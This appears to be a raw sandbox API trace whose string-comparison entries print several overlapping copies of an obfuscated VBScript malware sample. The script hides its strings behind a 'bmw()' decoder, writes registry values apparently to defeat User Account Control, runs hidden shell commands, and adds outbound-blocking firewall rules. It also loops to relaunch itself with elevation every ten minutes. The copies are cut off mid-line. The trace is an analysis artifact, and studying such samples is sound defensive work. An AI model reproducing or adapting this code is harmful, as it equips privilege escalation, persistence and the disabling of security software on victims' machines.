bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.352] wcsncmp (_String1="me\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.352] wcsncmp (_String1="e\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.352] wcsncmp (_String1="\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0226.352] wcsncmp (_String1="\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.352] wcsncmp (_String1="End If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 